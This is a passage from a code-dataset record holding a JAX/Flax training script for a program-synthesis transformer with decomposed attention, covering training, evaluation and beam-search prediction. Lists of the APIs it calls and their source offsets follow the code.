-jnp.sum(onehot_targets * nn.log_softmax(logits), axis=-1)\n normalizing_factor = jnp.prod(jnp.asarray(targets.shape))\n if weights is not None:\n loss = loss * weights\n normalizing_factor = weights.sum()\n\n return loss.sum(), normalizing_factor\n\n\ndef compute_weighted_accuracy(logits, targets, weights=None):\n \"\"\"Compute weighted accuracy for log probs and targets.\n\n Args:\n logits: `[batch, length, num_classes]` float array.\n targets: categorical targets `[batch, length]` int array.\n weights: None or array of shape [batch, length, 1]\n\n Returns:\n Tuple of scalar accuracy and batch normalizing factor.\n \"\"\"\n if logits.ndim != targets.ndim + 1:\n raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %\n (str(logits.shape), str(targets.shape)))\n acc = jnp.equal(jnp.argmax(logits, axis=-1), targets)\n normalizing_factor = jnp.prod(jnp.asarray(targets.shape))\n if weights is not None:\n acc = acc * weights\n normalizing_factor = weights.sum()\n\n return acc.sum(), normalizing_factor\n\n\ndef compute_metrics(logits, targets, weights):\n \"\"\"Compute summary metrics.\"\"\"\n loss, weight_sum = compute_weighted_cross_entropy(logits, targets, weights)\n acc, _ = compute_weighted_accuracy(logits, targets, weights)\n metrics = {\n 'loss': loss,\n 'accuracy': acc,\n 'denominator': weight_sum,\n }\n metrics = jax.lax.psum(metrics, 'batch')\n return metrics\n\n\n# Train / eval / decode step functions.\n# -----------------------------------------------------------------------------\n\n\ndef train_step(optimizer,\n inputs,\n outputs,\n programs,\n learning_rate_fn,\n config,\n dropout_rng):\n \"\"\"Train on batch of program tasks.\"\"\"\n # We handle PRNG splitting inside the top pmap, rather\n # than handling it outside in the training loop - doing the\n # latter can add some stalls to the devices.\n dropout_rng, new_dropout_rng = jax.random.split(dropout_rng)\n\n weights = jnp.where(programs > 0, 1, 0).astype(jnp.float32)\n\n def loss_fn(params):\n \"\"\"Loss function used for training.\"\"\"\n logits = models.DecomposeAttentionTransformer(config).apply(\n {'params': params},\n inputs,\n outputs,\n programs,\n rngs={'dropout': dropout_rng})\n loss, weight_sum = compute_weighted_cross_entropy(logits, programs, weights)\n mean_loss = loss / weight_sum\n return mean_loss, logits\n\n step = optimizer.state.step\n lr = learning_rate_fn(step)\n grad_fn = jax.value_and_grad(loss_fn, has_aux=True)\n (_, logits), grad = grad_fn(optimizer.target)\n grad = jax.lax.pmean(grad, 'batch')\n new_optimizer = optimizer.apply_gradient(grad, learning_rate=lr)\n\n # Get metrics.\n metrics = compute_metrics(logits, programs, weights)\n metrics['learning_rate'] = lr\n return new_optimizer, metrics, new_dropout_rng\n\n\ndef eval_step(params, inputs, outputs, programs, eos_token, config):\n \"\"\"Collect metrics for evaluation during training.\"\"\"\n weights = jnp.where(\n jnp.logical_and(programs > 0,\n jnp.logical_and(programs != config.base_config.bos_token,\n programs != eos_token)),\n 1, 0).astype(jnp.float32)\n logits = models.DecomposeAttentionTransformer(config).apply(\n {'params': params}, inputs, outputs, programs)\n\n return compute_metrics(logits, programs, weights)\n\n\ndef initialize_cache(inputs, outputs, programs, max_decode_len, config):\n \"\"\"Initialize a cache for a given input shape and max decode length.\"\"\"\n target_shape = (programs.shape[0], max_decode_len)\n dtype = config.base_config.dtype\n initial_variables = models.DecomposeAttentionTransformer(config).init(\n jax.random.PRNGKey(0),\n jnp.ones(inputs.shape, dtype),\n jnp.ones(outputs.shape, dtype),\n jnp.ones(target_shape, dtype))\n return initial_variables['cache']\n\n\ndef predict_step(params,\n inputs,\n outputs,\n cache,\n beam_size,\n eos_token,\n max_decode_len,\n config,\n slow_decode=True):\n \"\"\"Predict translation with fast decoding beam search on a batch.\"\"\"\n # Prepare transformer fast-decoder call for beam search: for beam search, we\n # need to set up our decoder model to handle a batch size equal to\n # batch_size * beam_size, where each batch item's data is expanded in-place\n # rather than tiled.\n flat_encoded = decode.flat_batch_beam_expand(\n models.DecomposeAttentionTransformer(config).apply(\n {'params': params},\n inputs,\n outputs,\n method=models.DecomposeAttentionTransformer.encode),\n beam_size)\n\n encoded_padding_mask = jnp.where(outputs > 0, 1, 0).astype(jnp.float32)\n flat_encoded_padding_mask = decode.flat_batch_beam_expand(\n encoded_padding_mask, beam_size)\n\n if slow_decode:\n def tokens_ids_to_logits(flat_ids):\n \"\"\"Token slice to logits from decoder model.\"\"\"\n # --> [batch * beam, 1, vocab]\n flat_logits = models.DecomposeAttentionTransformer(config=config).apply(\n {'params': params},\n flat_ids,\n flat_encoded,\n flat_encoded_padding_mask,\n method=models.DecomposeAttentionTransformer.decode)\n return flat_logits\n else:\n def tokens_ids_to_logits(flat_ids, flat_cache):\n \"\"\"Token slice to logits from decoder model.\"\"\"\n # --> [batch * beam, 1, vocab]\n flat_logits, new_vars = models.DecomposeAttentionTransformer(\n config=config).apply(\n {'params': params, 'cache': flat_cache},\n flat_ids,\n flat_encoded,\n flat_encoded_padding_mask,\n mutable=['cache'],\n method=models.DecomposeAttentionTransformer.decode)\n new_flat_cache = new_vars['cache']\n # Remove singleton sequence-length dimension:\n # [batch * beam, 1, vocab] --> [batch * beam, vocab]\n flat_logits = flat_logits.squeeze(axis=1)\n return flat_logits, new_flat_cache\n\n # Using the above-defined single-step decoder function, run a\n # beam search over possible sequences given input encoding.\n beam_seqs, _ = decode.beam_search(\n inputs,\n cache,\n tokens_ids_to_logits,\n beam_size=beam_size,\n alpha=0.6,\n bos_token=config.base_config.bos_token,\n eos_token=eos_token,\n max_decode_len=max_decode_len,\n slow_decode=slow_decode)\n\n # Beam search returns [n_batch, n_beam, n_length] with beam dimension\n # sorted in increasing order of log-probability.\n return beam_seqs\n\n\n# Util functions for prediction\n# -----------------------------------------------------------------------------\n\n\ndef pad_examples(x, desired_batch_size):\n \"\"\"Expand batch to desired size by repeating last slice.\"\"\"\n batch_pad = desired_batch_size - x.shape[0]\n tile_dims = [1] * len(x.shape)\n tile_dims[0] = batch_pad\n return np.concatenate([x, np.tile(x[-1], tile_dims)], axis=0)\n\n\ndef tohost(x):\n \"\"\"Collect batches from all devices to host and flatten batch dimensions.\"\"\"\n n_device, n_batch, *remaining_dims = x.shape\n return x.reshape((n_device * n_batch,) + tuple(remaining_dims))\n\n\ndef per_host_sum_pmap(in_tree):\n \"\"\"Execute psum on in_tree's leaves over one device per host.\"\"\"\n host2devices = collections.defaultdict(list)\n for d in jax.devices():\n host2devices[d.host_id].append(d)\n devices = [host2devices[k][0] for k in host2devices]\n host_psum = jax.pmap(lambda x: jax.lax.psum(x, 'i'), 'i', devices=devices)\n def pre_pmap(xs):\n return jax.tree_map(lambda x: jnp.broadcast_to(x, (1,) + x.shape), xs)\n def post_pmap(xs):\n return jax.tree_map(lambda x: x[0], xs)\n return post_pmap(host_psum(pre_pmap(in_tree)))\n\n\ndef eval_predicted(predicted, inputs, outputs, parse_beam_fn):\n \"\"\"Evaluate predicted program beams.\"\"\"\n best_p, best_score = None, -1\n\n # predicted shape [beam_size, length]\n for beam in predicted[::-1]:\n try:\n p = parse_beam_fn(beam)\n p_outs = [p(inp) for inp in inputs]\n score = np.sum([p_out == out for p_out, out in zip(p_outs, outputs)])\n if score > best_score:\n best_p, best_score = p, score\n except: # pylint: disable=bare-except\n pass\n if best_score >= len(inputs): # Found solution.\n break\n return best_p, best_score\n\n\ndef shorten(key):\n splits = key.split('_')\n return ''.join(s[0] for s in splits)\n\n\ndef main(_):\n tf.enable_v2_behavior()\n\n tf.random.set_seed(FLAGS.seed)\n np.random.seed(FLAGS.seed)\n random.seed(FLAGS.seed)\n\n # BOS special attention only makes sense if we are using relative attention\n # and it's not the baseline.\n if FLAGS.bos_special_attention and (not FLAGS.use_relative_attention or\n FLAGS.attention_mask_type == 'baseline'):\n raise ValueError(\n \"bos_special_attention doesn't work when use_relative_attention={} and \"\n 'attention_mask_type={}'.format(FLAGS.use_relative_attention,\n FLAGS.attention_mask_type))\n\n if not gfile.isdir(FLAGS.save_dir):\n gfile.makedirs(FLAGS.save_dir)\n\n hparam_str_dict = dict(seed=FLAGS.seed, lr=FLAGS.lr)\n # Get hyperparmaters\n if FLAGS.xm_parameters:\n for key, value in json.loads(FLAGS.xm_parameters).items():\n if key not in hparam_str_dict:\n hparam_str_dict[key] = value\n\n hparam_str = ','.join(['%s=%s' % (shorten(k), str(hparam_str_dict[k]))\n for k in sorted(hparam_str_dict.keys())])\n\n # Number of local devices for this host.\n n_devices = jax.local_device_count()\n\n if jax.host_id() == 0:\n summary_writer = tensorboard.SummaryWriter(\n os.path.join(FLAGS.save_dir, 'tb', hparam_str))\n\n batch_size = FLAGS.per_device_batch_size * n_devices\n io_shape = (FLAGS.per_device_batch_size,\n FLAGS.num_strings_per_task,\n FLAGS.max_characters)\n program_shape = (FLAGS.per_device_batch_size, FLAGS.max_program_length)\n\n # Setup DSL\n # ---------------------------------------------------------------------------\n\n # Build token tables.\n id_char_table = {i+1: char for (i, char) in enumerate(dsl.CHARACTER)}\n char_id_table = {char: id for id, char in id_char_table.items()}\n id_token_table, token_id_table = dsl_tokens.build_token_tables()\n io_vocab_size = len(char_id_table) + 1 # For padding.\n program_vocab_size = len(token_id_table) + 1\n\n bos_token = token_id_table[dsl.BOS]\n eos_token = token_id_table[dsl.EOS]\n\n # Parse io and program token sequences (for eval).\n def decode_io(inputs, outputs):\n \"\"\"Decode io examples tokens.\"\"\"\n def decode_str(s):\n \"\"\"Decode string tokens.\"\"\"\n return ''.join([id_char_table[c_id] for c_id in s if c_id > 0])\n\n inps, outs = [], []\n for inp, out in zip(inputs, outputs):\n inps.append(decode_str(inp))\n outs.append(decode_str(out))\n return inps, outs\n\n def decode_program(program):\n \"\"\"Decode program tokens.\"\"\"\n program = program[:np.argmax(program == eos_token) + 1].astype(np.int32)\n program = program[program != bos_token]\n\n try:\n return dsl.decode_program(program.tolist(), id_token_table)\n except: # pylint: disable=bare-except\n return None # Program does not compile.\n\n # Load Dataset\n # ---------------------------------------------------------------------------\n logging.info('Initializing dataset.')\n if not FLAGS.dataset_filepattern:\n raise ValueError('Must specify filepattern to dataset.')\n\n # Training dataset.\n logging.info('Loading dataset from %s', FLAGS.dataset_filepattern)\n padded_shapes = (io_shape[1:], io_shape[1:], program_shape[1:])\n logging.info('padded_shapes: %s', padded_shapes)\n dataset = input_pipeline.create_dataset_from_tf_record(\n FLAGS.dataset_filepattern, token_id_table, char_id_table)\n dataset = dataset.padded_batch(\n batch_size,\n padded_shapes=padded_shapes,\n drop_remainder=True)\n # Split evaluation and training.\n eval_ds = dataset.take(FLAGS.num_eval_steps)\n # Decrease batch of predict dataset to handle beam search.\n predict_ds = eval_ds.unbatch().padded_batch(\n int(np.ceil(batch_size / 10)),\n padded_shapes=padded_shapes)\n train_ds = dataset.skip(FLAGS.num_eval_steps).repeat()\n train_iter = train_ds.as_numpy_iterator()\n\n # Build Model and Optimizer\n # ---------------------------------------------------------------------------\n use_dropout = False\n base_config = base_models.TransformerConfig(\n vocab_size=io_vocab_size,\n output_vocab_size=program_vocab_size,\n shift=True,\n emb_dim=FLAGS.embedding_dim,\n num_heads=FLAGS.num_heads,\n num_layers=FLAGS.num_layers,\n qkv_dim=FLAGS.embedding_dim,\n mlp_dim=FLAGS.hidden_dim,\n max_len=max(FLAGS.max_characters, FLAGS.max_program_length),\n use_relative_attention=FLAGS.use_relative_attention,\n deterministic=not use_dropout,\n decode=False,\n bos_token=bos_token)\n train_config = models.DecomposeAttentionTransformerConfig(\n base_config=base_config,\n attention_mask_type=FLAGS.attention_mask_type,\n bos_special_attention=FLAGS.bos_special_attention)\n eval_config = models.DecomposeAttentionTransformerConfig(\n base_config=base_config.replace(deterministic=not use_dropout),\n attention_mask_type=FLAGS.attention_mask_type,\n bos_special_attention=FLAGS.bos_special_attention)\n predict_config = models.DecomposeAttentionTransformerConfig(\n base_config=base_config.replace(\n shift=False, deterministic=not use_dropout,\n decode=not FLAGS.slow_decode),\n attention_mask_type=FLAGS.attention_mask_type,\n bos_special_attention=FLAGS.bos_special_attention)\n\n rng = jax.random.PRNGKey(FLAGS.seed)\n rng = jax.random.fold_in(rng, jax.host_id())\n rng, init_rng = jax.random.split(rng)\n\n m = models.DecomposeAttentionTransformer(eval_config)\n initial_variables = jax.jit(m.init)(\n {'params': init_rng, 'dropout': init_rng},\n jnp.ones(io_shape, jnp.float32),\n jnp.ones(io_shape, jnp.float32),\n jnp.ones(program_shape, jnp.float32))\n\n optimizer_def = optim.Adam(\n FLAGS.lr,\n beta1=0.9,\n beta2=0.98,\n eps=1e-9,\n weight_decay=FLAGS.weight_decay)\n optimizer = optimizer_def.create(initial_variables['params'])\n\n del initial_variables # Don't keep a copy of the initial model.\n\n start_step = 0\n if FLAGS.restore_checkpoints:\n # Restore unreplicated optimizer + model state from last checkpoint.\n optimizer = checkpoints.restore_checkpoint(\n os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str), optimizer)\n # Grab last step.\n start_step = int(optimizer.state.step)\n logging.info('Found model checkpointed at step %d.', start_step)\n if FLAGS.finetune_start_step > 0:\n logging.info('Checking that start_step (%s) == finetune_start_step (%s)',\n start_step, FLAGS.finetune_start_step)\n assert start_step == FLAGS.finetune_start_step\n\n # Replicate optimizer.\n optimizer = jax_utils.replicate(optimizer)\n\n # TODO(jxihong): Implement fast decoding.\n assert FLAGS.slow_decode, 'Fast decoding is not implemented yet.'\n\n if FLAGS.finetune_start_step <= 0:\n learning_rate_fn = create_learning_rate_scheduler(\n base_learning_rate=FLAGS.lr)\n else:\n # Constant LR for finetuning.\n learning_rate_fn = create_learning_rate_scheduler(\n base_learning_rate=FLAGS.lr,\n factors='constant')\n p_train_step = jax.pmap(\n functools.partial(\n train_step,\n learning_rate_fn=learning_rate_fn,\n config=train_config),\n axis_name='batch')\n p_eval_step = jax.pmap(\n functools.partial(eval_step,\n eos_token=eos_token,\n config=eval_config),\n axis_name='batch')\n p_init_cache = jax.pmap(\n functools.partial(\n initialize_cache,\n max_decode_len=FLAGS.max_program_length,\n config=predict_config),\n axis_name='batch')\n p_pred_step = jax.pmap(\n functools.partial(\n predict_step,\n eos_token=eos_token,\n max_decode_len=FLAGS.max_program_length,\n config=predict_config,\n slow_decode=FLAGS.slow_decode),\n axis_name='batch',\n static_broadcasted_argnums=(4,))\n\n # Main Train Loop\n # ---------------------------------------------------------------------------\n dropout_rng = jax.random.split(rng, jax.local_device_count())\n del rng\n\n metrics_all = []\n tick = time.time()\n for step in range(start_step, FLAGS.num_train_steps):\n inputs, outputs, programs = common_utils.shard(next(train_iter))\n\n optimizer, metrics, dropout_rng = p_train_step(\n optimizer, inputs, outputs, programs, dropout_rng=dropout_rng)\n metrics_all.append(metrics)\n is_last_step = step == FLAGS.num_train_steps - 1\n\n # Save a Checkpoint\n if (step % FLAGS.checkpoint_freq == 0 and step > 0) or is_last_step:\n if jax.host_id() == 0:\n # Save unreplicated optimizer + model state.\n checkpoints.save_checkpoint(\n os.path.join(FLAGS.save_dir, 'checkpoints', hparam_str),\n jax_utils.unreplicate(optimizer),\n step)\n\n # Periodic metric handling.\n\n # Training Metrics\n if (step and step % FLAGS.log_freq == 0) or is_last_step:\n logging.info('Gathering training metrics.')\n metrics_all = common_utils.get_metrics(metrics_all)\n lr = metrics_all.pop('learning_rate').mean()\n metrics_sums = jax.tree_map(jnp.sum, metrics_all)\n denominator = metrics_sums.pop('denominator')\n summary = jax.tree_map(\n lambda x: x / denominator, # pylint: disable=cell-var-from-loop\n metrics_sums)\n summary['learning_rate'] = lr\n # Calculate (clipped) perplexity after averaging log-perplexities:\n summary['perplexity'] = jnp.clip(jnp.exp(summary['loss']), a_max=1.0e4)\n\n if jax.host_id() == 0:\n logging.info('Train in step: %d, loss: %.4f', step, summary['loss'])\n tock = time.time()\n steps_per_sec = FLAGS.log_freq / (tock - tick)\n tick = tock\n summary_writer.scalar('train/steps per second', steps_per_sec, step)\n for key, val in summary.items():\n summary_writer.scalar('train/' + key, val, step)\n summary_writer.flush()\n # Reset metric accumulation for next evaluation cycle.\n metrics_all = []\n\n # Evaluation Metrics\n if (step and step % FLAGS.eval_freq == 0) or is_last_step:\n logging.info('Gathering evaluation metrics.')\n t_evaluation_start = time.time()\n eval_metrics = []\n for batches in eval_ds.as_numpy_iterator():\n inputs, outputs, programs = common_utils.shard(batches)\n\n metrics = p_eval_step(optimizer.target, inputs, outputs, programs)\n eval_metrics.append(metrics)\n\n eval_metrics = common_utils.get_metrics(eval_metrics)\n eval_metrics_sums = jax.tree_map(jnp.sum, eval_metrics)\n eval_denominator = eval_metrics_sums.pop('denominator')\n eval_summary = jax.tree_map(\n lambda x: x / eval_denominator, # pylint: disable=cell-var-from-loop\n eval_metrics_sums)\n\n if jax.host_id() == 0:\n logging.info('Evaluation time: %.4f s step %d, loss: %.4f.',\n time.time()-t_evaluation_start, step, eval_summary['loss'])\n for key, val in eval_summary.items():\n summary_writer.scalar('eval/' + key, val, step)\n summary_writer.flush()\n\n # Beam search metrics.\n if (step and step % FLAGS.predict_freq == 0) or is_last_step:\n logging.info('Gathering beam search metrics.')\n for beam_size in [1, 5, 10, 20, 50]:\n t_inference_start = time.time()\n pred_acc = 0\n pred_denominator = 0\n\n ios, targets, predictions, top_of_beams = [], [], [], []\n for batches in predict_ds.as_numpy_iterator():\n pred_batch = batches\n # Handle final odd-sized batch by padding instead of dropping it.\n cur_pred_batch_size = pred_batch[0].shape[0]\n if cur_pred_batch_size % n_devices:\n padded_size = int(\n np.ceil(cur_pred_batch_size / n_devices) * n_devices)\n # pylint: disable=cell-var-from-loop\n pred_batch = jax.tree_map(\n lambda x: pad_examples(x, padded_size), pred_batch)\n inputs, outputs, programs = common_utils.shard(pred_batch)\n\n cache = (p_init_cache(inputs, outputs, programs)\n if not FLAGS.slow_decode else None)\n predicted = p_pred_step(optimizer.target, inputs, outputs, cache,\n beam_size)\n predicted = tohost(predicted)\n inputs, outputs, programs = map(tohost, (inputs, outputs, programs))\n\n pred_denominator += programs.shape[0]\n for i, beams in enumerate(predicted):\n inps, outs = decode_io(inputs[i], outputs[i])\n p, p_score = eval_predicted(\n beams, inps, outs, parse_beam_fn=decode_program)\n if p_score >= len(inps):\n pred_acc += 1\n ios.append(' ; '.join(map(str, zip(inps, outs))))\n targets.append(decode_program(programs[i]).to_string())\n try:\n predictions.append(p.to_string())\n except: # pylint: disable=bare-except\n predictions.append('Did not compile')\n logging.info('ios: %s', ios[-1])\n logging.info('target: %s', targets[-1])\n beams_log = []\n for beam in beams:\n try:\n beams_log.append(decode_program(beam).to_string())\n except: # pylint: disable=bare-except\n beams_log.append('Did not compile')\n logging.info('predicted beam: %s', '\\n'.join(beams_log))\n\n top_of_beam = []\n for index, beam in enumerate(beams[:-5:-1]):\n try:\n decoded_program = decode_program(beam).to_string()\n except: # pylint: disable=bare-except\n decoded_program = 'Did not compile'\n top_of_beam.append('index: {}, decoded: {}, tokens: {}'.format(\n index, decoded_program, beam))\n top_of_beams.append('\\n\\n'.join(top_of_beam))\n\n all_pred_acc, all_pred_denominator = per_host_sum_pmap(\n jax.tree_map(np.array, (pred_acc, pred_denominator)))\n\n # Record beam search results as text summaries.\n message = []\n for n in np.random.choice(np.arange(len(predictions)), 8):\n text = (f'ios: {ios[n]}\\n\\ntarget: {targets[n]}\\n\\n'\n f'predicted: {predictions[n]}\\n\\n'\n f'top of beam:\\n\\n{top_of_beams[n]}\\n\\n')\n message.append(text)\n\n # Write to tensorboard.\n if jax.host_id() == 0:\n slow_or_fast = 'slow' if FLAGS.slow_decode else 'fast'\n logging.info(\n 'Prediction time, %s (beam %d): %.4f s, step %d, score %.4f',\n slow_or_fast, beam_size, time.time() - t_inference_start, step,\n all_pred_acc / all_pred_denominator)\n summary_writer.scalar(\n 'predict-{}/score-{}'.format(slow_or_fast, beam_size),\n all_pred_acc / all_pred_denominator, step)\n summary_writer.text('samples-{}'.format(beam_size),\n '\\n------\\n'.join(message), step)\n summary_writer.flush()\n\n\nif __name__ == '__main__':\n app.run(main)\n"},"apis":{"kind":"list like","value":["flax.training.common_utils.shard","flax.optim.Adam","tensorflow.compat.v2.random.set_seed","latent_programmer.tasks.robust_fill.tokens.build_token_tables","absl.logging.info","jax.tree_map","latent_programmer.decode.beam_search","flax.training.common_utils.onehot","jax.jit","sys.path.append","absl.flags.DEFINE_float","jax.random.split","jax.random.PRNGKey","absl.flags.DEFINE_boolean","absl.app.run","jax.numpy.asarray","flax.jax_utils.replicate","flax.jax_utils.unreplicate","numpy.random.seed","jax.value_and_grad","numpy.tile","numpy.ceil","json.loads","jax.lax.psum","jax.numpy.where","jax.numpy.cos","jax.local_device_count","jax.devices","jax.numpy.broadcast_to","latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer","numpy.argmax","jax.lax.pmean","jax.numpy.ones","flax.training.common_utils.get_metrics","absl.flags.DEFINE_string","time.time","jax.host_id","tensorflow.compat.v2.enable_v2_behavior","latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record","latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig","jax.numpy.minimum","jax.numpy.logical_and","absl.flags.DEFINE_bool","absl.flags.DEFINE_integer","jax.numpy.sqrt","os.path.join","jax.numpy.exp","random.seed","jax.numpy.maximum","collections.defaultdict","latent_programmer.decode.flat_batch_beam_expand","functools.partial","flax.linen.log_softmax","jax.numpy.argmax"],"string":"[\n \"flax.training.common_utils.shard\",\n \"flax.optim.Adam\",\n \"tensorflow.compat.v2.random.set_seed\",\n \"latent_programmer.tasks.robust_fill.tokens.build_token_tables\",\n \"absl.logging.info\",\n \"jax.tree_map\",\n \"latent_programmer.decode.beam_search\",\n \"flax.training.common_utils.onehot\",\n \"jax.jit\",\n \"sys.path.append\",\n \"absl.flags.DEFINE_float\",\n \"jax.random.split\",\n \"jax.random.PRNGKey\",\n \"absl.flags.DEFINE_boolean\",\n \"absl.app.run\",\n \"jax.numpy.asarray\",\n \"flax.jax_utils.replicate\",\n \"flax.jax_utils.unreplicate\",\n \"numpy.random.seed\",\n \"jax.value_and_grad\",\n \"numpy.tile\",\n \"numpy.ceil\",\n \"json.loads\",\n \"jax.lax.psum\",\n \"jax.numpy.where\",\n \"jax.numpy.cos\",\n \"jax.local_device_count\",\n \"jax.devices\",\n \"jax.numpy.broadcast_to\",\n \"latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformer\",\n \"numpy.argmax\",\n \"jax.lax.pmean\",\n \"jax.numpy.ones\",\n \"flax.training.common_utils.get_metrics\",\n \"absl.flags.DEFINE_string\",\n \"time.time\",\n \"jax.host_id\",\n \"tensorflow.compat.v2.enable_v2_behavior\",\n \"latent_programmer.decomposition_transformer_attention.input_pipeline.create_dataset_from_tf_record\",\n \"latent_programmer.decomposition_transformer_attention.decomposition_models.DecomposeAttentionTransformerConfig\",\n \"jax.numpy.minimum\",\n \"jax.numpy.logical_and\",\n \"absl.flags.DEFINE_bool\",\n \"absl.flags.DEFINE_integer\",\n \"jax.numpy.sqrt\",\n \"os.path.join\",\n \"jax.numpy.exp\",\n \"random.seed\",\n \"jax.numpy.maximum\",\n \"collections.defaultdict\",\n \"latent_programmer.decode.flat_batch_beam_expand\",\n \"functools.partial\",\n \"flax.linen.log_softmax\",\n \"jax.numpy.argmax\"\n]"},"extract_api":{"kind":"string","value":"[((1590, 1615), 'sys.path.append', 'sys.path.append', (['\"\"\"../../\"\"\"'], {}), \"('../../')\\n\", (1605, 1615), False, 'import sys\\n'), ((1658, 1724), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"seed\"\"\"', '(0)', '\"\"\"Fixed random seed for training.\"\"\"'], {}), \"('seed', 0, 'Fixed random seed for training.')\\n\", (1678, 1724), False, 'from absl import flags\\n'), ((1725, 1774), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['\"\"\"lr\"\"\"', '(0.001)', '\"\"\"Learning rate.\"\"\"'], {}), \"('lr', 0.001, 'Learning rate.')\\n\", (1743, 1774), False, 'from absl import flags\\n'), ((1774, 1863), 'absl.flags.DEFINE_float', 'flags.DEFINE_float', (['\"\"\"weight_decay\"\"\"', '(0.1)', '\"\"\"Decay factor for AdamW-style weight decay.\"\"\"'], {}), \"('weight_decay', 0.1,\\n 'Decay factor for AdamW-style weight decay.')\\n\", (1792, 1863), False, 'from absl import flags\\n'), ((1880, 1946), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"embedding_dim\"\"\"', '(256)', '\"\"\"Embedding dimension.\"\"\"'], {}), \"('embedding_dim', 256, 'Embedding dimension.')\\n\", (1900, 1946), False, 'from absl import flags\\n'), ((1947, 2007), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"hidden_dim\"\"\"', '(512)', '\"\"\"Hidden dimension.\"\"\"'], {}), \"('hidden_dim', 512, 'Hidden dimension.')\\n\", (1967, 2007), False, 'from absl import flags\\n'), ((2008, 2065), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_heads\"\"\"', '(4)', '\"\"\"Number of layers.\"\"\"'], {}), \"('num_heads', 4, 'Number of layers.')\\n\", (2028, 2065), False, 'from absl import flags\\n'), ((2066, 2135), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_layers\"\"\"', '(3)', '\"\"\"Number of Transformer heads.\"\"\"'], {}), \"('num_layers', 3, 'Number of Transformer heads.')\\n\", (2086, 2135), False, 'from absl import flags\\n'), ((2136, 2214), 'absl.flags.DEFINE_boolean', 'flags.DEFINE_boolean', (['\"\"\"slow_decode\"\"\"', '(True)', '\"\"\"Use slow decoding for prediction?\"\"\"'], {}), \"('slow_decode', True, 'Use slow decoding for prediction?')\\n\", (2156, 2214), False, 'from absl import flags\\n'), ((2216, 2305), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['\"\"\"dataset_filepattern\"\"\"', 'None', '\"\"\"Filepattern for TFRecord dataset.\"\"\"'], {}), \"('dataset_filepattern', None,\\n 'Filepattern for TFRecord dataset.')\\n\", (2235, 2305), False, 'from absl import flags\\n'), ((2322, 2414), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"per_device_batch_size\"\"\"', '(16)', '\"\"\"Number of program tasks in a batch.\"\"\"'], {}), \"('per_device_batch_size', 16,\\n 'Number of program tasks in a batch.')\\n\", (2342, 2414), False, 'from absl import flags\\n'), ((2432, 2527), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_strings_per_task\"\"\"', '(4)', '\"\"\"Number of input/output strings per task.\"\"\"'], {}), \"('num_strings_per_task', 4,\\n 'Number of input/output strings per task.')\\n\", (2452, 2527), False, 'from absl import flags\\n'), ((2545, 2636), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"max_program_length\"\"\"', '(100)', '\"\"\"Maximum number of tokens in program.\"\"\"'], {}), \"('max_program_length', 100,\\n 'Maximum number of tokens in program.')\\n\", (2565, 2636), False, 'from absl import flags\\n'), ((2654, 2758), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"max_characters\"\"\"', '(120)', '\"\"\"Maximum number of characters in input/output strings.\"\"\"'], {}), \"('max_characters', 120,\\n 'Maximum number of characters in input/output strings.')\\n\", (2674, 2758), False, 'from absl import flags\\n'), ((2777, 2847), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['\"\"\"save_dir\"\"\"', 'None', '\"\"\"Directory to save results to.\"\"\"'], {}), \"('save_dir', None, 'Directory to save results to.')\\n\", (2796, 2847), False, 'from absl import flags\\n'), ((2848, 2925), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_train_steps\"\"\"', '(2000000)', '\"\"\"Number of training steps.\"\"\"'], {}), \"('num_train_steps', 2000000, 'Number of training steps.')\\n\", (2868, 2925), False, 'from absl import flags\\n'), ((2926, 2999), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"num_eval_steps\"\"\"', '(10)', '\"\"\"Number of evaluation steps.\"\"\"'], {}), \"('num_eval_steps', 10, 'Number of evaluation steps.')\\n\", (2946, 2999), False, 'from absl import flags\\n'), ((3000, 3085), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"log_freq\"\"\"', '(1000)', '\"\"\"Number of steps between training logs.\"\"\"'], {}), \"('log_freq', 1000, 'Number of steps between training logs.'\\n )\\n\", (3020, 3085), False, 'from absl import flags\\n'), ((3081, 3153), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"eval_freq\"\"\"', '(2000)', '\"\"\"Number of steps between eval.\"\"\"'], {}), \"('eval_freq', 2000, 'Number of steps between eval.')\\n\", (3101, 3153), False, 'from absl import flags\\n'), ((3154, 3254), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"predict_freq\"\"\"', '(50000)', '\"\"\"Number of steps between prediction (beam search).\"\"\"'], {}), \"('predict_freq', 50000,\\n 'Number of steps between prediction (beam search).')\\n\", (3174, 3254), False, 'from absl import flags\\n'), ((3272, 3367), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"checkpoint_freq\"\"\"', '(50000)', '\"\"\"Number of steps between checkpoint saves.\"\"\"'], {}), \"('checkpoint_freq', 50000,\\n 'Number of steps between checkpoint saves.')\\n\", (3292, 3367), False, 'from absl import flags\\n'), ((3385, 3529), 'absl.flags.DEFINE_integer', 'flags.DEFINE_integer', (['\"\"\"finetune_start_step\"\"\"', '(-1)', '\"\"\"Step the initial checkpoint should start at for finetuning, or -1 if not finetuning.\"\"\"'], {}), \"('finetune_start_step', -1,\\n 'Step the initial checkpoint should start at for finetuning, or -1 if not finetuning.'\\n )\\n\", (3405, 3529), False, 'from absl import flags\\n'), 